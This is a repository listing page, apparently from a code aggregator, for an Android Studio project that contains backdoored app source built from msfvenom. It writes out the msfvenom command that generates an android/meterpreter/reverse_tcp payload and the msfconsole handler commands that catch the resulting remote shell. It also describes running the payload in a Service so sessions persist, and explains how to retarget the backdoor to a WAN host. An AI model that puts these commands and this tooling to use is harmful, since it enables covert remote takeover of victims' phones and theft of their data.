• Stars
    star
    134
  • Rank 270,967 (Top 6 %)
  • Language
    Java
  • Created almost 9 years ago
  • Updated almost 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Android backdoored app, improved source code of msfvenom android .apk

msfvenom-backdoor-android

This Android Studio project contains the source code of the backdoored .apk generated by

$msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk

(in Kali linux suite)

For an procedure guide of penetration into an Android system, please visit my website (Italian only) https://dragonitesec.wordpress.com/2016/11/06/tutorial-come-penetrare-in-un-telefono-android/

Tries to solve the issue:

[*]Meterpreter session x closed - Reason:died

message, by starting payload in a Service. Meterpreter session is more stable in this way (original msfvenom apk often causes session to die very soon)

In this project the backdoor works in LAN settings, opening a meterpreter session to 192.168.178.30 on port 4444 (this settings can be changed in Payload.java file if you want to work in a WAN) The control server must be executing handler exploit with Metasploit, with following commands:

$msfconsole
$use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST 192.168.178.30
$set LPORT 4444
$exploit

after the metasploit machine is waiting, the .apk can be installed and launched on the android terminal.

Remember to sign the .apk with a key before installing

Tested on Samsung Galaxy S6 - Lollipop